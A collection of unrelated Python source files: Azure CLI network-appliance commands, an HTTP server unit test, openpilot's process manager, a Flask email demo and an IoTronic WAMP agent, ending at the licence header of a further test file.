virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
serverTest.py
|
'''
Created on Jul 25, 2014
@author: gigemjt
'''
import unittest
import BaseHTTPServer
import time
import threading
import urllib2
from src.connection.server import RequestHandler
from src.projectManagment import ProjectManagment
from src.projectManagment import Project
HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS!!!
PORT_NUMBER = 9000 # Maybe set this to 9000.
handlerInstance2 = None
class Test(unittest.TestCase):
def setUp(self):
server_class = BaseHTTPServer.HTTPServer
RequestHandlerMock.protocol_version = "HTTP/1.0"
self.httpd = server_class((HOST_NAME, PORT_NUMBER), RequestHandlerMock)
#print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
t = threading.Thread(target = self.startServer)
t.daemon = True
t.start()
url = 'http://' + HOST_NAME + ':' + str(PORT_NUMBER) + '/'
urllib2.urlopen(url) #required to create an instance of the handler
time.sleep(1)
print "ending setup"
print
def startServer(self):
print 'starting server!'
try:
self.httpd.serve_forever()
except:
pass
def tearDown(self):
print
print 'stopping server'
self.httpd.server_close()
#print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
def testPathTranslator(self):
print 'starting test testPathTranslator'
handler = handlerInstance2
print handler.translate_path('/')
def testWebTranslator(self):
"""Passes if adding /web/index.html to the url redirects the computer to find website folder"""
print 'starting test testWebTranslator'
handler = handlerInstance2
try:
path = handler.translate_path('/web/index.html')
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
def testWebTranslatorWithDash(self):
"""Passes if adding /web-project/index.html to the url redirects the computer to find website folder"""
print 'starting test testWebTranslator with project'
handler = handlerInstance2
try:
path = handler.translate_path('/web-project/index.html')
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
def testEmptyProjectTranslator(self):
"""Passes if the default project is correctly found and the correct file is opened"""
print 'starting test testEmptyProjectTranslator'
handler = handlerInstance2
try:
path = handler.translate_path('/project/DevelopmentGraphTestFile')
print path
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
def testProjectTranslator(self):
"""Passes if the project path is correctly found in the list of current projects"""
print 'starting test testProjectTranslator'
handler = handlerInstance2
projectPath = handler.translate_path('/project/')
print 'project path ' + projectPath
ProjectManagment.getInstance().addProject(Project('DevelopmentGraph', projectPath))
try:
path = handler.translate_path('/project-DevelopmentGraph/DevelopmentGraphTestFile')
print path
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
class RequestHandlerMock(RequestHandler):
def __init__(self, *args, **kwargs):
global handlerInstance2
handlerInstance2 = self
print 'MAKING INSTANCE OF REQUEST'
RequestHandler.__init__(self, *args, **kwargs)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1005
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes \
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
app.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li
:license: MIT, see LICENSE for more details.
"""
import os
from threading import Thread
from settings import config
import sendgrid
from sendgrid.helpers.mail import Email as SGEmail, Content, Mail as SGMail
from flask_mail import Mail, Message
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField
from wtforms.validators import DataRequired, Email
from flask import Flask, flash, redirect, url_for, render_template, request
app = Flask(__name__)
config_name=os.getenv('FLASK_CONFIG', 'development')
app.config.from_object(config[config_name])
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
app.config.update(
SECRET_KEY=app.config['SECRET_KEY'],
MAIL_SERVER=app.config['MAIL_SERVER'],
MAIL_PORT=465,
MAIL_USE_SSL=True,
MAIL_USERNAME=app.config['MAIL_USERNAME'],
MAIL_PASSWORD=app.config['MAIL_PASSWORD'],
MAIL_DEFAULT_SENDER=app.config['MAIL_DEFAULT_SENDER']
)
mail = Mail(app)
# send over SMTP
def send_smtp_mail(subject, to, body):
message = Message(subject, recipients=[to], body=body)
mail.send(message)
# send over SendGrid Web API
def send_api_mail(subject, to, body):
#apikey=app.config['SENDGRID_API_KEY']
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = SGEmail('Grey Li <noreply@helloflask.com>')
to_email = SGEmail(to)
content = Content("text/plain", body)
email = SGMail(from_email, subject, to_email, content)
sg.client.mail.send.post(request_body=email.get())
# send email asynchronously
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, body):
# app = current_app._get_current_object() # if use factory (i.e. create_app()), get app like this
message = Message(subject, recipients=[to], body=body)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
# send email with HTML body
def send_subscribe_mail(subject, to, **kwargs):
message = Message(subject, recipients=[to], sender='Flask Weekly <%s>' % os.getenv('MAIL_USERNAME'))
message.body = render_template('emails/subscribe.txt', **kwargs)
message.html = render_template('emails/subscribe.html', **kwargs)
mail.send(message)
class EmailForm(FlaskForm):
to = StringField('To', validators=[DataRequired(), Email()])
subject = StringField('Subject', validators=[DataRequired()])
body = TextAreaField('Body', validators=[DataRequired()])
submit_smtp = SubmitField('Send with SMTP')
submit_api = SubmitField('Send with SendGrid API')
submit_async = SubmitField('Send with SMTP asynchronously')
class SubscribeForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
submit = SubmitField('Subscribe')
@app.route('/', methods=['GET', 'POST'])
def index():
form = EmailForm()
if form.validate_on_submit():
to = form.to.data
subject = form.subject.data
body = form.body.data
if form.submit_smtp.data:
send_smtp_mail(subject, to, body)
method = request.form.get('submit_smtp')
elif form.submit_api.data:
send_api_mail(subject, to, body)
method = request.form.get('submit_api')
else:
send_async_mail(subject, to, body)
method = request.form.get('submit_async')
flash('Email sent %s! Check your inbox.' % ' '.join(method.split()[1:]))
return redirect(url_for('index'))
form.subject.data = 'Hello, World!'
form.body.data = 'Across the Great Wall we can reach every corner in the world.'
return render_template('index.html', form=form)
@app.route('/subscribe', methods=['GET', 'POST'])
def subscribe():
form = SubscribeForm()
if form.validate_on_submit():
name = form.name.data
email = form.email.data
send_subscribe_mail('Subscribe Success!', email, name=name)
flash('Confirmation email have been sent! Check your inbox.')
return redirect(url_for('subscribe'))
return render_template('subscribe.html', form=form)
@app.route('/unsubscribe')
def unsubscribe():
flash('Want to unsubscribe? No way...')
return redirect(url_for('subscribe'))
|
agent.py
|
# Copyright 2017 MDSLAB - University of Messina
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from autobahn.twisted import wamp
from autobahn.twisted import websocket
from autobahn.wamp import types
from twisted.internet.defer import inlineCallbacks
from iotronic.common import exception
from iotronic.common.i18n import _LI
from iotronic.common.i18n import _LW
from iotronic.db import api as dbapi
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
import threading
from threading import Thread
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.internet import reactor
import os
import signal
LOG = logging.getLogger(__name__)
wamp_opts = [
cfg.StrOpt('wamp_transport_url',
default='ws://localhost:8181/',
help=('URL of wamp broker')),
cfg.StrOpt('wamp_realm',
default='s4t',
help=('realm broker')),
cfg.BoolOpt('register_agent',
default=False,
help=('Flag for se a registration agent')),
cfg.IntOpt('autoPingInterval',
default=2,
help=('autoPingInterval parameter for wamp')),
cfg.IntOpt('autoPingTimeout',
default=2,
help=('autoPingInterval parameter for wamp')),
]
CONF = cfg.CONF
CONF.register_opts(wamp_opts, 'wamp')
shared_result = {}
wamp_session_caller = None
AGENT_HOST = None
def wamp_request(e, kwarg, session):
id = threading.current_thread().ident
shared_result[id] = {}
shared_result[id]['result'] = None
def success(d):
shared_result[id]['result'] = d
LOG.debug("DEVICE sent: %s", str(d))
e.set()
return shared_result[id]['result']
def fail(failure):
shared_result[id]['result'] = failure
LOG.error("WAMP FAILURE: %s", str(failure))
e.set()
return shared_result[id]['result']
LOG.debug("Calling %s...", kwarg['wamp_rpc_call'])
d = session.wamp_session.call(wamp_session_caller,
kwarg['wamp_rpc_call'], *kwarg['data'])
d.addCallback(success)
d.addErrback(fail)
# OSLO ENDPOINT
class WampEndpoint(object):
def __init__(self, wamp_session, agent_uuid):
self.wamp_session = wamp_session
setattr(self, agent_uuid + '.s4t_invoke_wamp', self.s4t_invoke_wamp)
def s4t_invoke_wamp(self, ctx, **kwarg):
e = threading.Event()
LOG.debug("CONDUCTOR sent me:", kwarg)
th = threading.Thread(target=wamp_request, args=(e, kwarg, self))
th.start()
e.wait()
LOG.debug("result received from wamp call: %s",
str(shared_result[th.ident]['result']))
result = shared_result[th.ident]['result']
del shared_result[th.ident]['result']
return result
class WampFrontend(wamp.ApplicationSession):
@inlineCallbacks
def onJoin(self, details):
global wamp_session_caller, AGENT_HOST
wamp_session_caller = self
import iotronic.wamp.functions as fun
self.subscribe(fun.board_on_leave, 'wamp.session.on_leave')
self.subscribe(fun.board_on_join, 'wamp.session.on_join')
try:
if CONF.wamp.register_agent:
self.register(fun.registration, u'stack4things.register')
LOG.info("I have been set as registration agent")
self.register(fun.connection,
AGENT_HOST + u'.stack4things.connection')
self.register(fun.echo,
AGENT_HOST + u'.stack4things.echo')
LOG.info("procedure registered")
except Exception as e:
LOG.error("could not register procedure: {0}".format(e))
LOG.info("WAMP session ready.")
session_l = yield self.call(u'wamp.session.list')
session_l.remove(details.session)
fun.update_sessions(session_l)
def onDisconnect(self):
LOG.info("disconnected")
class WampClientFactory(websocket.WampWebSocketClientFactory,
ReconnectingClientFactory):
maxDelay = 30
def clientConnectionFailed(self, connector, reason):
# print "reason:", reason
LOG.warning("Wamp Connection Failed.")
ReconnectingClientFactory.clientConnectionFailed(self,
connector, reason)
def clientConnectionLost(self, connector, reason):
# print "reason:", reason
LOG.warning("Wamp Connection Lost.")
ReconnectingClientFactory.clientConnectionLost(self,
connector, reason)
class RPCServer(Thread):
def __init__(self):
global AGENT_HOST
# AMQP CONFIG
endpoints = [
WampEndpoint(WampFrontend, AGENT_HOST),
]
Thread.__init__(self)
transport = oslo_messaging.get_transport(CONF)
target = oslo_messaging.Target(topic=AGENT_HOST + '.s4t_invoke_wamp',
server='server1')
self.server = oslo_messaging.get_rpc_server(transport,
target,
endpoints,
executor='threading')
def run(self):
LOG.info("Starting AMQP server... ")
self.server.start()
def stop(self):
LOG.info("Stopping AMQP server... ")
self.server.stop()
LOG.info("AMQP server stopped. ")
class WampManager(object):
def __init__(self):
component_config = types.ComponentConfig(
realm=unicode(CONF.wamp.wamp_realm))
session_factory = wamp.ApplicationSessionFactory(
config=component_config)
session_factory.session = WampFrontend
transport_factory = WampClientFactory(session_factory,
url=CONF.wamp.wamp_transport_url)
transport_factory.autoPingInterval = CONF.wamp.autoPingInterval
transport_factory.autoPingTimeout = CONF.wamp.autoPingTimeout
LOG.debug("wamp url: %s wamp realm: %s",
CONF.wamp.wamp_transport_url, CONF.wamp.wamp_realm)
websocket.connectWS(transport_factory)
def start(self):
LOG.info("Starting WAMP server...")
reactor.run()
def stop(self):
LOG.info("Stopping WAMP-agent server...")
reactor.stop()
LOG.info("WAMP server stopped.")
class WampAgent(object):
def __init__(self, host):
signal.signal(signal.SIGINT, self.stop_handler)
logging.register_options(CONF)
CONF(project='iotronic')
logging.setup(CONF, "iotronic-wamp-agent")
# to be removed asap
self.host = host
self.dbapi = dbapi.get_instance()
try:
wpa = self.dbapi.register_wampagent(
{'hostname': self.host, 'wsurl': CONF.wamp.wamp_transport_url})
except exception.WampAgentAlreadyRegistered:
LOG.warn(_LW("A wampagent with hostname %(hostname)s "
"was previously registered. Updating registration"),
{'hostname': self.host})
wpa = self.dbapi.register_wampagent(
{'hostname': self.host, 'wsurl': CONF.wamp.wamp_transport_url},
update_existing=True)
self.wampagent = wpa
self.wampagent.ragent = CONF.wamp.register_agent
self.wampagent.save()
global AGENT_HOST
AGENT_HOST = self.host
self.r = RPCServer()
self.w = WampManager()
self.r.start()
self.w.start()
def del_host(self, deregister=True):
if deregister:
try:
self.dbapi.unregister_wampagent(self.host)
LOG.info(_LI('Successfully stopped wampagent with hostname '
'%(hostname)s.'),
{'hostname': self.host})
except exception.WampAgentNotFound:
pass
else:
LOG.info(_LI('Not deregistering wampagent with hostname '
'%(hostname)s.'),
{'hostname': self.host})
def stop_handler(self, signum, frame):
self.w.stop()
self.r.stop()
self.del_host()
os._exit(0)
|
test_cp.py
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
